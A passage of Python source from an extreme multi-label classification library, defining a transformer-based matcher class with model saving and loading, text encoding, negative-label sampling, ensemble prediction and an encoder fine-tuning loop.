optional): length to truncate input text, default None to skip truncation. """ only_topk: int = 20 post_processor: str = "noop" ensemble_method: str = "transformer-only" truncate_length: int = None # type: ignore def override_with_kwargs(self, pred_kwargs): """Override Class attributes from prediction key-word arguments. Args: pred_kwargs (dict): Args for prediction. Returns: self (PredParams): Overriden self instance. """ if pred_kwargs is not None: if not isinstance(pred_kwargs, dict): raise TypeError("type(pred_kwargs) must be dict") overridden_only_topk = pred_kwargs.get("only_topk", None) overridden_post_processor = pred_kwargs.get("post_processor", None) overridden_ensemble_method = pred_kwargs.get("ensemble_method", None) overridden_truncate_length = pred_kwargs.get("truncate_length", None) if overridden_only_topk: self.only_topk = overridden_only_topk if overridden_post_processor: self.post_processor = overridden_post_processor if overridden_ensemble_method: self.ensemble_method = overridden_ensemble_method if overridden_truncate_length: self.truncate_length = overridden_truncate_length return self def __init__( self, text_encoder, text_tokenizer, text_model, C=None, concat_model=None, train_params=None, pred_params=None, ): """ Args: text_encoder (BertForXMC, RobertaForXMC or XLNetForXMC): text text_encoder using transformer model text_tokenizer (BertTokenizer, RobertaTokenizer or XLNetTokenizer): text text_tokenizer for to convert raw text to torch tensors text_model (TransformerLinearXMCHead): linear projection from transformer text_encoder to label space C (csr_matrix): clustering matrix, shape = (nr_labels, nr_code) concat_model (MLModel): linear model that takes concatenation of transformer embeddings and input numerical features to predict on label space train_params (TransformerMatcher.TrainParams, optional): instance of TransformerMatcher.TrainParams. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams. """ self.text_encoder = text_encoder self.text_tokenizer = text_tokenizer self.C = C self.text_model = text_model self.concat_model = concat_model self.train_params = self.TrainParams.from_dict(train_params) self.pred_params = self.PredParams.from_dict(pred_params) def get_pred_params(self): return copy.deepcopy(self.pred_params) def to_device(self, device, n_gpu=0): """Move the text_encoder to desired device Args: device (torch.device): the destination device n_gpu (int, optional): if > 1, text_encoder will be converted to torch.nn.DataParallel to use multi-GPU """ self.text_encoder.to(device) # multi-gpu eval if n_gpu > 1 and not isinstance(self.text_encoder, torch.nn.DataParallel): self.text_encoder = torch.nn.DataParallel(self.text_encoder) return self def clear_cuda(self): """Clear CUDA memory""" if hasattr(self.text_encoder, "module"): self.text_encoder = self.text_encoder.module self.text_encoder.to(torch.device("cpu")) self.text_model.to(torch.device("cpu")) torch.cuda.empty_cache() return self @classmethod def get_loss_function(cls, loss_function): """Get the loss function for training Args: loss_function (str): type of loss function, in TransformerMatcher.LOSS_FUNCTION_TYPES Returns: loss_function (torch.nn.module) """ return cls.LOSS_FUNCTION_TYPES[loss_function] @property def device(self): """Get the current device of the text_encoder Returns: torch.device """ if hasattr(self.text_encoder, "module"): return self.text_encoder.module.device else: return self.text_encoder.device @property def nr_codes(self): """Get the number of codes""" return self.C.shape[1] @property def nr_features(self): """Get the feature dimension of concat_model""" return self.concat_model.nr_features if self.concat_model else None @property def nr_labels(self): """Get the number of labels""" return self.text_model.num_labels def save(self, save_dir): """Save the models, text_tokenizer and training arguments to file Args: save_dir (str): dir to save the model, will be created if it doesn't exist """ os.makedirs(save_dir, exist_ok=True) # use .module when do parallel training encoder_to_save = ( self.text_encoder.module if hasattr(self.text_encoder, "module") else self.text_encoder ) param = { "model": self.__class__.__name__, "text_encoder": encoder_to_save.__class__.__name__, "nr_labels": self.nr_labels, "nr_features": self.nr_features, "nr_codes": self.nr_codes, "train_params": self.train_params.to_dict(), "pred_params": self.pred_params.to_dict(), } param = self.append_meta(param) with open(os.path.join(save_dir, "param.json"), "w", encoding="utf-8") as f: f.write(json.dumps(param, indent=True)) smat_util.save_matrix(os.path.join(save_dir, "C.npz"), self.C) encoder_dir = os.path.join(save_dir, "text_encoder") os.makedirs(encoder_dir, exist_ok=True) # this creates config.json, pytorch_model.bin encoder_to_save.save_pretrained(encoder_dir) # this creates text_tokenizer files tokenizer_dir = os.path.join(save_dir, "text_tokenizer") os.makedirs(tokenizer_dir, exist_ok=True) self.text_tokenizer.save_pretrained(tokenizer_dir) # this creates text_model text_model_dir = os.path.join(save_dir, "text_model") torch.save(self.text_model, text_model_dir) # save the concat_model concat_model_dir = os.path.join(save_dir, "concat_model") if self.concat_model: self.concat_model.save(concat_model_dir) @classmethod def load(cls, load_dir): """Load models, text_tokenizer and training arguments from file Args: load_dir (str): dir to load the models, text_tokenizer and training arguments Returns: TransformerMatcher """ # load TrainParams and PredParams param_dir = os.path.join(load_dir, "param.json") param = dict() if os.path.exists(param_dir): param = json.loads(open(param_dir, "r").read()) train_params = cls.TrainParams.from_dict(param.get("train_params", None)) pred_params = cls.PredParams.from_dict(param.get("pred_params", None)) # load text_encoder encoder_dir = os.path.join(load_dir, "text_encoder") if not os.path.isdir(encoder_dir): raise ValueError(f"text_encoder does not exist at {encoder_dir}") with open(os.path.join(encoder_dir, "config.json"), "r", encoding="utf-8") as fin: transformer_type = json.loads(fin.read())["model_type"] dnn_type = ENCODER_CLASSES[transformer_type] encoder_config = dnn_type.config_class.from_pretrained(encoder_dir) text_encoder, loading_info = dnn_type.model_class.from_pretrained( encoder_dir, config=encoder_config, output_loading_info=True ) if len(loading_info["missing_keys"]) > 0: LOGGER.warning( "Weights of {} not initialized from pre-trained text_encoder: {}".format( text_encoder.__class__.__name__, loading_info["missing_keys"] ) ) # load text_tokenizer tokenizer_dir = os.path.join(load_dir, "text_tokenizer") if not os.path.isdir(tokenizer_dir): raise ValueError(f"text_tokenizer does not exist at {tokenizer_dir}") text_tokenizer = dnn_type.tokenizer_class.from_pretrained(tokenizer_dir) # load text_model text_model_dir = os.path.join(load_dir, "text_model") if os.path.exists(text_model_dir): text_model = torch.load(text_model_dir) else: text_model = TransformerLinearXMCHead( encoder_config.hidden_size, encoder_config.num_labels ) LOGGER.warning( f"XMC text_model of {text_encoder.__class__.__name__} not initialized from pre-trained model." ) # load C C_path = os.path.join(load_dir, "C.npz") if not os.path.exists(C_path): raise ValueError(f"Cluster code does not exist at {C_path}") C = smat_util.load_matrix(C_path) # load concat_model concat_model_dir = os.path.join(load_dir, "concat_model") concat_model = None if os.path.exists(concat_model_dir): concat_model = MLModel.load(concat_model_dir) return cls( text_encoder, text_tokenizer, text_model, C=C, concat_model=concat_model, train_params=train_params, pred_params=pred_params, ) @classmethod def download_model(cls, model_shortcut, num_labels, hidden_dropout_prob=0.1, cache_dir=""): """Initialize a matcher by downloading a pre-trained model from s3 Args: model_shortcut (str): model name shortcut, e.g. 'bert-base-cased' num_labels (int): model output size hidden_dropout_prob (float, optional): hidden states dropout probability. Default 0.1 cache_dir (str, optional): path to store downloaded model, if the model already exists at cache_dir, downloading will be ignored Returns: TransformerMatcher """ use_cache = cache_dir if cache_dir else None # AutoConfig will infer transformer type from shortcut config = AutoConfig.from_pretrained( model_shortcut, hidden_dropout_prob=hidden_dropout_prob, output_hidden_states=False, summary_use_proj=False, num_labels=num_labels, finetuning_task=None, cache_dir=use_cache, # if None, create temp folder ) if config.model_type not in ENCODER_CLASSES: raise ValueError(f"Model type {config.model_type} not supported.") dnn_type = ENCODER_CLASSES[config.model_type] text_tokenizer = dnn_type.tokenizer_class.from_pretrained( model_shortcut, cache_dir=use_cache, ) text_encoder = dnn_type.model_class.from_pretrained( model_shortcut, config=config, cache_dir=use_cache, ) text_model = TransformerLinearXMCHead(config.hidden_size, num_labels) return cls(text_encoder, text_tokenizer, text_model) def text_to_tensor(self, corpus, num_workers=4, max_length=None): """Convert input text corpus into padded tensors Args: corpus (iterable over str): input text strings num_workers (int, optional): number of processors to use for data encoding. Default 4 max_length(int, optional): max length to which input text will be padded/truncated. Default None to use the max length in the corpus Returns: feature_tensors (dict): { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } """ convert_kwargs = { "add_special_tokens": True, "padding": "max_length", "truncation": True, "max_length": max_length, "return_tensors": "pt", # return pytorch tensors "return_token_type_ids": True, "return_attention_mask": True, } num_workers = min(len(corpus), num_workers) # generate inst feature batches chunk_size = (len(corpus) + num_workers - 1) // num_workers data_chunks = [corpus[chunk_size * i : chunk_size * (i + 1)] for i in range(num_workers)] LOGGER.info( "***** Encoding data with {} workers, len={} truncation={}*****".format( num_workers, len(corpus), max_length ) ) t_start = time.time() pool = mp.get_context("spawn").Pool(processes=num_workers) async_results = [ pool.apply_async( parallel_util.call_instance_method, args=( self.text_tokenizer, self.text_tokenizer.batch_encode_plus.__name__, (), dict( convert_kwargs, batch_text_or_text_pairs=data_chunks[i], ), ), ) for i in range(num_workers) ] pool.close() map(mp.pool.ApplyResult.get, async_results) result_lists = [r.get() for r in async_results] LOGGER.info("***** Finished with time cost={} *****".format(time.time() - t_start)) feature_tensors = {} if len(result_lists) > 1: keys_ = [ ("input_ids", self.text_tokenizer.pad_token_id), ("attention_mask", 0), ("token_type_ids", 1), ] # for split sequence chunks to list of sequences since pad_sequence requires # all trailing dimensions to be the same for kw, pad_val in keys_: feature_tensors[kw] = ( pad_sequence( sum( [ list(torch.chunk(t[kw].T, t[kw].shape[0], dim=1)) for t in result_lists ], [], ), batch_first=True, padding_value=pad_val, ) .permute(1, 0, 2) .flatten(1) .T ) else: feature_tensors = result_lists[0] return feature_tensors @staticmethod def _get_label_tensors(M, Y, idx_padding=-1, val_padding=0, max_labels=None): """ Given matching matrix M and label matrix Y, construct label tensors for XMC training The non-zero indices of Y are seen as positive labels and therefore all included in the result. Example: M = smat.csr_matrix([[1, 1, 0, 0], [0, 0, 1, 1]]) Y = smat.csr_matrix([[0, 1, 0, 2], [0, 0, 0, 3]]) then the returned values will be: label_indices = torch.LongTensor([[1, 3, 0], [3, 2, -1]]) label_values = torch.FloatTensor([[1., 2., 0.], [3., 0., 0.]]) Args: M (csr_matrix or None): matching matrix, shape = (nr_inst, nr_labels) It's indices are the candidate label indices to consider It's values will not be used Y (csr_matrix or None): label matrix, shape = (nr_inst, nr_labels) It's non-zero indices are positive labels and will always be included. idx_padding (int, optional): the index used to pad all label_indices to the same length. Default -1 val_padding (float, optional): the value used to fill in label_values corresponding to the zero entrees in Y. Default 0 max_labels (int, optional): max number of labels considered for each instance, will subsample from existing label indices if need to. Default None to use max row nnz of M. Returns: label_indices (torch.LongTensor or None): containing label indices with shape = (nr_inst, max_labels). Return None if M is None label_values (torch.FloatTensor or None): containing label values with shape = (nr_inst, max_labels). If Y is None, return None """ if M is None and Y is None: return None, None elif M is None and Y is not None: # if M is None, taking all labels into account return None, torch.FloatTensor(Y.toarray()) if Y is not None: if Y.shape != M.shape: raise ValueError("Y and M shape mismatch: {} and {}".format(Y.shape, M.shape)) label_lower_bound = max(Y.indptr[1:] - Y.indptr[:-1]) # make sure all positive labels are included M1 = smat_util.binarized(M) + smat_util.binarized(Y) else: M1 = M label_lower_bound = 0 label_upper_bound = max(M1.indptr[1:] - M1.indptr[:-1]) if max_labels is None: max_labels = label_upper_bound else: max_labels = min(max_labels, label_upper_bound) if max_labels < label_lower_bound: max_labels = label_lower_bound LOGGER.warning( f"Increasing max_labels to {label_lower_bound} to accommodate all positive labels." ) nr_inst = M1.shape[0] label_indices = np.zeros((nr_inst, max_labels), dtype=np.int64) + idx_padding if Y is not None: label_values = np.zeros((nr_inst, max_labels), dtype=np.float32) + val_padding for i in range(nr_inst): offset = 0 neg_samples = M1.indices[M1.indptr[i] : M1.indptr[i + 1]] # fill with positive samples first if Y is not None: y_nnz = Y.indptr[i + 1] - Y.indptr[i] rng = slice(Y.indptr[i], Y.indptr[i + 1]) label_indices[i, :y_nnz] = Y.indices[rng] label_values[i, :y_nnz] = Y.data[rng] offset += y_nnz neg_samples = neg_samples[np.invert(np.isin(neg_samples, Y.indices[rng]))] # fill the rest slots with negative samples if neg_samples.size > max_labels - offset: # random sample negative labels neg_samples = np.random.choice(neg_samples, max_labels - offset) label_indices[i, offset : offset + neg_samples.size] = neg_samples label_indices = torch.LongTensor(label_indices) return label_indices, None if Y is None else torch.FloatTensor(label_values) @staticmethod def ensemble_prediction(transformer_pred_csr, concat_pred_csr, only_topk, ens_method): """Generate micro ensemble of concat predictions and transformer predictions Args: transformer_pred_csr (csr_matrix): transformer prediction matrix concat_pred_csr (csr_matrix): concat_model prediction matrix only_topk (int): number of top predictions to gather ens_method (str): the method used for micro ensemble. Choices: concat-only: only use concat model predictions transformer-only: only use transformer predictions rank_average: rank-average concat/transformer predictions round_robin: round robin ensemble liner/transformer predictions average: average concat/transformer predictions Returns: ensemble_pred_csr (csr_matrix) """ if transformer_pred_csr.shape != concat_pred_csr.shape: raise ValueError( f"Transformer/concat prediction mismatch: {transformer_pred_csr.shape} and {concat_pred_csr.shape}" ) LOGGER.info(f"Using {ens_method} for transformer/concat ensemble of pred_csr") if ens_method == "concat-only": pred_csr_codes = concat_pred_csr elif ens_method == "transformer-only": pred_csr_codes = transformer_pred_csr elif ens_method == "average": pred_csr_codes = smat_util.CsrEnsembler.average( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) elif ens_method == "rank_average": pred_csr_codes = smat_util.CsrEnsembler.rank_average( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) elif ens_method == "round_robin": pred_csr_codes = smat_util.CsrEnsembler.round_robin( smat_util.sorted_csr(transformer_pred_csr), smat_util.sorted_csr(concat_pred_csr), ) else: raise ValueError(f"Unknown ensemble method {ens_method}") return smat_util.sorted_csr(pred_csr_codes.astype(np.float32), only_topk=only_topk) def predict( self, X_text, X_feat=None, csr_codes=None, pred_params=None, **kwargs, ): """Predict with the transformer matcher, allow batch prediction to reduce memory cost Args: X_text (list of str or dict): prediction input text or dictionary of encoded tensors: { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } X_feat (csr_matrix or ndarray, optional): prediction instance feature matrix, shape = (nr_insts, nr_features) csr_codes (csr_matrix, optional): matching matrix, shape = (nr_inst, nr_codes), only its non-zero entrees will be evaluated. Its values will be combined with current prediction through post_processor. Default None to consider all labels. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams or dictionary to override stored pred_params. Default None to ignore overriding kwargs: batch_size (int, optional): total batch_size for (multi-GPU) forward propagation. Default 8 batch_gen_workers (int, optional): number of CPU workers for batch generation. Default 4 pred_chunk_size (int, optional): maximum number of instances to predict on for each round. Default None to predict on all instances at once. Returns: label_pred (csr_matrix): label prediction logits, shape = (nr_inst, nr_labels) embeddings (ndarray): array of instance embeddings shape = (nr_inst, hidden_dim) """ if pred_params is None: pred_params = self.get_pred_params() elif isinstance(pred_params, dict): pred_params = self.get_pred_params().override_with_kwargs(pred_params) elif not isinstance(pred_params, TransformerMatcher.PredParams): raise TypeError(f"Unsupported type for pred_params: {type(pred_params)}") if isinstance(X_text, list): X_text = self.text_to_tensor( X_text, num_workers=kwargs.get("batch_gen_workers", 4), max_length=pred_params.truncate_length, ) nr_inst = X_text["input_ids"].shape[0] pred_chunk_size = kwargs.pop("pred_chunk_size", None) if pred_chunk_size is None or pred_chunk_size >= nr_inst: label_pred, embeddings = self._predict( X_text, X_feat=X_feat, csr_codes=csr_codes, pred_params=pred_params, **kwargs, ) else: # batch prediction to avoid OOM embedding_chunks = [] P_chunks = [] for i in range(0, nr_inst, pred_chunk_size): cur_P, cur_embedding = self._predict( {k: v[i : i + pred_chunk_size] for k, v in X_text.items()}, X_feat=None if X_feat is None else X_feat[i : i + pred_chunk_size, :], csr_codes=None if csr_codes is None else csr_codes[i : i + pred_chunk_size, :], pred_params=pred_params, **kwargs, ) embedding_chunks.append(cur_embedding) P_chunks.append(cur_P) label_pred = smat_util.vstack_csr(P_chunks) embeddings = np.vstack(embedding_chunks) return label_pred, embeddings def _predict( self, X_text, X_feat=None, csr_codes=None, pred_params=None, **kwargs, ): """Predict with the transformer matcher Args: X_text (dict): prediction inputs, dictionary of tensors { "input_ids": tensor of input token ids, "attention_mask": tensor of attention masks, "token_type_ids": tensor of token type ids, } X_feat (csr_matrix or ndarray, optional): prediction instance feature matrix, shape = (nr_insts, nr_features) csr_codes (csr_matrix, optional): matching matrix, shape = (nr_inst, nr_codes), only its non-zero entrees will be evaluated. Its values will be combined with current prediction through post_processor. Default None to consider all labels. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams or dictionary to override stored pred_params. Default None to ignore overriding kwargs: batch_size (int, optional): total batch_size for (multi-GPU) forward propagation. Default 8 batch_gen_workers (int, optional): number of CPU workers for batch generation. Default 4 Returns: label_pred (csr_matrix): label prediction logits, shape = (nr_inst, nr_labels) embeddings (ndarray): array of instance embeddings shape = (nr_inst, hidden_dim) """ batch_gen_workers = kwargs.get("batch_gen_workers", 4) if csr_codes is not None: # need to keep explicit zeros in csr_codes_next # therefore do not pass it through constructor if not isinstance(csr_codes, smat.csr_matrix): raise TypeError(f"Got type={type(csr_codes)} for csr_codes!") # getting the result in csr by computing csr * csr csr_codes_next = clib.sparse_matmul( csr_codes, self.C.T, eliminate_zeros=False, threads=batch_gen_workers, ) LOGGER.info( "Predict with csr_codes_next({}) with avr_nnz={}".format( csr_codes_next.shape, csr_codes_next.nnz / csr_codes_next.shape[0] ) ) else: csr_codes_next = None LOGGER.info("Predict on input text tensors({})".format(X_text["input_ids"].shape)) label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( csr_codes_next, None, idx_padding=self.text_model.label_pad ) data = XMCDataset( X_text["input_ids"], X_text["attention_mask"], X_text["token_type_ids"], torch.arange(X_text["input_ids"].shape[0]), label_values=label_values_pt, label_indices=label_indices_pt, ) # since number of active labels may vary # using pinned memory will slow down data loading dataloader = DataLoader( data, sampler=SequentialSampler(data), pin_memory=False, batch_size=kwargs.get("batch_size", 8), num_workers=batch_gen_workers, ) local_topk = min(pred_params.only_topk, self.nr_labels) embeddings = [] batch_cpred = [] for batch in dataloader: self.text_encoder.eval() self.text_model.eval() cur_batch_size = batch[0].shape[0] batch = tuple(t.to(self.device) for t in batch) with torch.no_grad(): inputs = { "input_ids": batch[0], "attention_mask": batch[1], "token_type_ids": batch[2], "instance_number": batch[3], "label_values": None, "label_indices": None if csr_codes_next is None else batch[-1], } text_model_W_seq, text_model_b_seq = self.text_model( output_indices=inputs["label_indices"], num_device=len(self.text_encoder.device_ids) if hasattr(self.text_encoder, "device_ids") else 1, ) outputs = self.text_encoder( input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"], token_type_ids=inputs["token_type_ids"], label_embedding=(text_model_W_seq, text_model_b_seq), ) c_pred = outputs["logits"] # get topk prediction if csr_codes_next is None: # take all labels into consideration cpred_csr = smat.csr_matrix(c_pred.cpu().numpy()) cpred_csr.data = PostProcessor.get(pred_params.post_processor).transform( cpred_csr.data, inplace=True ) cpred_csr = smat_util.sorted_csr(cpred_csr, only_topk=local_topk) batch_cpred.append(cpred_csr) else: cur_act_labels = csr_codes_next[inputs["instance_number"].cpu()] nnz_of_insts = cur_act_labels.indptr[1:] - cur_act_labels.indptr[:-1] inst_idx = np.repeat(np.arange(cur_batch_size, dtype=np.uint32), nnz_of_insts) label_idx = cur_act_labels.indices.astype(np.uint32) val = c_pred.cpu().numpy().flatten() val = val[ np.argwhere( inputs["label_indices"].cpu().flatten() != self.text_model.label_pad ) ].flatten() val = PostProcessor.get(pred_params.post_processor).transform(val, inplace=True) val = PostProcessor.get(pred_params.post_processor).combiner( val, cur_act_labels.data ) cpred_csr = smat_util.sorted_csr_from_coo( cur_act_labels.shape, inst_idx, label_idx, val, only_topk=local_topk ) batch_cpred.append(cpred_csr) embeddings.append(outputs["pooled_output"].cpu().numpy()) pred_csr_codes = smat_util.vstack_csr(batch_cpred) embeddings = np.concatenate(embeddings, axis=0) ens_method = pred_params.ensemble_method # concat_model prediction requires concat_model and X_feat if all(v is not None for v in [self.concat_model, X_feat]): cat_embeddings = sk_normalize(embeddings, axis=1, copy=True) if isinstance(X_feat, smat.csr_matrix): cat_embeddings = smat_util.dense_to_csr(cat_embeddings) cat_embeddings = smat_util.hstack_csr([X_feat, cat_embeddings], dtype=np.float32) else: cat_embeddings = np.hstack([X_feat, cat_embeddings]) concat_pred_csr_codes = self.concat_model.predict( cat_embeddings, csr_codes=csr_codes, # use original csr_codes rather than csr_codes_next only_topk=local_topk, post_processor=pred_params.post_processor, ) pred_csr_codes = TransformerMatcher.ensemble_prediction( pred_csr_codes, concat_pred_csr_codes, local_topk, ens_method ) elif self.concat_model is not None and ens_method != "transformer-only": LOGGER.warning( f"X_feat is missing for {ens_method} prediction, fall back to transformer-only" ) return pred_csr_codes, embeddings def fine_tune_encoder(self, prob, val_prob=None, val_csr_codes=None): """Fine tune the transformer text_encoder Args: prob (MLProblemWithText): training problem val_prob (MLProblemWithText, optional): validation problem val_csr_codes (csr_matrix, optional): prediction matrix for validation data, shape = (nr_val_inst, nr_codes) its values and indices will be used in combiner for next prediction Returns: TransformerMatcher """ train_params = self.train_params pred_params = self.pred_params loss_function = TransformerMatcher.get_loss_function(train_params.loss_function).to( self.device ) max_act_labels = train_params.max_active_matching_labels logging_steps = train_params.logging_steps max_steps = train_params.max_steps max_no_improve_cnt = train_params.max_no_improve_cnt if prob.M is not None: # need to keep explicit zeros in csr_codes_next # therefore do not pass it through constructor if not isinstance(prob.M, smat.csr_matrix): raise TypeError(f"Got type={type(prob.M)} for M!") # getting the result in csr by computing csr * csr M_next = clib.sparse_matmul( prob.M, self.C.T, eliminate_zeros=False, threads=train_params.batch_gen_workers, ) do_resample = max_act_labels is not None and max_act_labels < max( M_next.indptr[1:] - M_next.indptr[:-1] ) else: M_next = None do_resample = False if prob.M is None or train_params.max_num_labels_in_gpu >= self.nr_labels: # put text_model to GPU self.text_model.to(self.device) label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( M_next, prob.Y, idx_padding=self.text_model.label_pad, max_labels=max_act_labels, ) train_data = XMCDataset( prob.X_text["input_ids"], prob.X_text["attention_mask"], prob.X_text["token_type_ids"], torch.arange(prob.X_text["input_ids"].shape[0]), # instance number label_values=label_values_pt, label_indices=label_indices_pt, ) # since number of active labels may vary # using pinned memory will slow down data loading train_dataloader = DataLoader( train_data, sampler=RandomSampler(train_data), pin_memory=False, batch_size=train_params.batch_size, num_workers=train_params.batch_gen_workers, ) # compute stopping criteria if train_params.max_steps > 0: t_total = train_params.max_steps steps_per_epoch = len(train_dataloader) // train_params.gradient_accumulation_steps train_params.num_train_epochs = train_params.max_steps // steps_per_epoch + 1 else: steps_per_epoch = len(train_dataloader) // train_params.gradient_accumulation_steps t_total = steps_per_epoch * train_params.num_train_epochs # Prepare optimizer, disable weight decay for bias and layernorm weights no_decay = ["bias", "LayerNorm.weight"] optimizer_grouped_parameters = [ { "params": [ p for n, p in self.text_encoder.named_parameters() if not any(nd in n for nd in no_decay) ], "weight_decay": train_params.weight_decay, }, { "params": [ p for n, p in self.text_encoder.named_parameters() if any(nd in n for nd in no_decay) ], "weight_decay": 0.0, }, ] optimizer = AdamW( optimizer_grouped_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) scheduler = get_scheduler( train_params.lr_schedule, optimizer, num_warmup_steps=train_params.warmup_steps, num_training_steps=t_total, ) sparse_parameters = list(self.text_model.parameters()) if prob.M is not None: emb_optimizer = torch.optim.SparseAdam( sparse_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) else: # For the top matcher treat text_model as dense layer emb_optimizer = AdamW( sparse_parameters, lr=train_params.learning_rate, eps=train_params.adam_epsilon, ) emb_scheduler = get_scheduler( train_params.lr_schedule, emb_optimizer, num_warmup_steps=train_params.warmup_steps, num_training_steps=t_total, ) # Start Batch Training LOGGER.info("***** Running training *****") LOGGER.info(" Num examples = %d", prob.X_text["input_ids"].shape[0]) LOGGER.info(" Num labels = %d", self.nr_labels) if prob.M is not None: LOGGER.info(" Num active labels per instance = %d", label_indices_pt.shape[1]) LOGGER.info(" Num Epochs = %d", train_params.num_train_epochs) LOGGER.info(" Learning Rate Schedule = %s", train_params.lr_schedule) LOGGER.info(" Batch size = %d", train_params.batch_size) LOGGER.info(" Gradient Accumulation steps = %d", train_params.gradient_accumulation_steps) LOGGER.info(" Total optimization steps = %d", t_total) global_step = 0 tr_loss, logging_loss = 0.0, 0.0 total_train_time, logging_elapsed = 0.0, 0.0 best_matcher_prec = -1 avg_matcher_prec = 0 save_cur_model = False no_improve_cnt = 0 self.text_encoder.zero_grad() self.text_model.zero_grad() for epoch in range(1, int(train_params.num_train_epochs) + 1): if do_resample and epoch > 1: # redo subsample negative labels label_indices_pt, label_values_pt = TransformerMatcher._get_label_tensors( M_next, prob.Y, idx_padding=self.text_model.label_pad, max_labels=train_params.max_active_matching_labels, ) train_data.refresh_labels( label_values=label_values_pt, label_indices=label_indices_pt, ) for batch_cnt, batch in enumerate(train_dataloader): self.text_encoder.train() self.text_model.train() start_time = time.time() batch = tuple(t.to(self.device) for t in batch) inputs = { "input_ids": batch[0], "attention_mask": batch[1], "token_type_ids": batch[2], "instance_number": batch[3], "label_values": batch[4], "label_indices": batch[-1] if prob.M is not None else None, } text_model_W_seq, text_model_b_seq = self.text_model( output_indices=inputs["label_indices"], num_device=len(self.text_encoder.device_ids) if hasattr(self.text_encoder, "device_ids") else 1, ) outputs = self.text_encoder( input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"], token_type_ids=inputs["token_type_ids"], label_embedding=(text_model_W_seq, text_model_b_seq), ) loss = loss_function(outputs["logits"], inputs["label_values"].to(self.device)) loss = loss.mean() # mean() to average on multi-gpu parallel training if train_params.gradient_accumulation_steps > 1: loss = loss / train_params.gradient_accumulation_steps loss.backward() tr_loss += loss.item() logging_elapsed += time.time() - start_time total_train_time += time.time() - start_time if (batch_cnt + 1) % train_params.gradient_accumulation_steps == 0: torch.nn.utils.clip_grad_norm_( self.text_encoder.parameters(), train_params.max_grad_norm ) optimizer.step() # perform gradient update scheduler.step() # update learning rate schedule optimizer.zero_grad() # clear gradient accumulation torch.nn.utils.clip_grad_norm_( self.text_model.parameters(), train_params.max_grad_norm ) emb_optimizer.step() # perform gradient update emb_scheduler.step() # update learning rate schedule emb_optimizer.zero_grad() # clear gradient accumulation global_step += 1 if logging_steps > 0 and global_step % logging_steps == 0: cur_loss = (tr_loss - logging_loss) / logging_steps LOGGER.info( "| [{:4d}/{:4d}][{:6d}/{:6d}] | {:4d}/{:4d} batches | ms/batch {:5.4f} | train_loss {:6e} | lr {:.6e}".format( int(epoch), int(train_params.num_train_epochs), int(global_step), int(t_total), int(batch_cnt), len(train_dataloader), logging_elapsed * 1000.0 / logging_steps, cur_loss, scheduler.get_last_lr()[0], ) ) logging_loss = tr_loss logging_elapsed = 0 if train_params.save_steps > 0 and global_step % train_params.save_steps == 0: if val_prob is not None: if val_prob.M is None: test_combos = zip(["all"], [None]) else: test_combos = zip( ["trn_ns", "pred_ns"], [val_prob.M, val_csr_codes] ) for val_type, valid_M in test_combos: avr_beam = 1 if valid_M is None else valid_M.nnz / valid_M.shape[0] # compute loss and prediction on test set val_pred, _ = self.predict( val_prob.X_text, csr_codes=valid_M, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, pred_params={"ensemble_method": "transformer-only"}, ) LOGGER.info("-" * 89) LOGGER.info( "| epoch {:3d} step {:6d} evaluation | training-time: {:5.4f}s average-beam: {:5.1f}".format( epoch, global_step, total_train_time, avr_beam, ) ) # compute precision on test set val_metrics = smat_util.Metrics.generate( val_prob.Y, val_pred, topk=pred_params.only_topk, ) LOGGER.info( "| {} test-prec {}".format( val_type, " ".join( "{:4.2f}".format(100 * v) for v in val_metrics.prec ), ) ) LOGGER.info( "| {} test-recl {}".format( val_type, " ".join( "{:4.2f}".format(100 * v) for v in val_metrics.recall ), ) ) avg_matcher_prec = np.mean(val_metrics.prec) # save the model with highest val precision save_cur_model = avg_matcher_prec > best_matcher_prec else: # if val set not given, always save save_cur_model = True if save_cur_model: no_improve_cnt = 0 LOGGER.info( "| **** saving model (avg_prec={}) to {} at global_step {} ****".format( 100 * avg_matcher_prec, train_params.model_dir, global_step, ) ) best_matcher_prec = avg_matcher_prec self.save(train_params.model_dir) else: no_improve_cnt += 1 LOGGER.info("-" * 89) if (max_steps > 0 and global_step > max_steps) or ( max_no_improve_cnt > 0 and no_improve_cnt >= max_no_improve_cnt ): break if (max_steps > 0 and global_step > max_steps) or ( max_no_improve_cnt > 0 and no_improve_cnt >= max_no_improve_cnt ): break return self @classmethod def train( cls, prob, csr_codes=None, val_prob=None, val_csr_codes=None, train_params=None, pred_params=None, **kwargs, ): """Train the transformer matcher Args: prob (MLProblemWithText): training problem csr_codes (csr_matrix, optional): prediction matrix, shape = (nr_inst, nr_codes) its values and indices will be used in combiner for next prediction val_prob (MLProblemWithText, optional): validation problem val_csr_codes (csr_matrix, optional): prediction matrix for validation data, shape = (nr_val_inst, nr_codes) its values and indices will be used in combiner for next prediction train_params (TransformerMatcher.TrainParams, optional): instance of TransformerMatcher.TrainParams. pred_params (TransformerMatcher.PredParams, optional): instance of TransformerMatcher.PredParams. kwargs: bootstrapping (tuple): (init_encoder, init_embeddings) the text_encoder and corresponding instance embeddings generated by it. Used for bootstrap current text_encoder and text_model. Default None to ignore return_dict (bool): if True, return a dictionary with model and its prediction/embeddings on train/validation dataset. Default False. Returns: results (TransformerMatcher or dict): if return_dict=True, return a dictionary: { matcher: TransformerMatcher instance trn_pred (csr_matrix): topk prediction on training data, shape = (nr_inst, nr_labels) val_pred (csr_matrix or None): topk prediction on validation data, shape = (nr_val_inst, nr_labels) trn_embeddings (ndarray): instance embedding on training data, shape = (nr_inst, hidden_dim). val_embeddings (ndarray or None): instance embedding on validation data, shape = (nr_val_inst, hidden_dim). } otherwise return the trained TransformerMatcher instance """ train_params = cls.TrainParams.from_dict(train_params) pred_params = 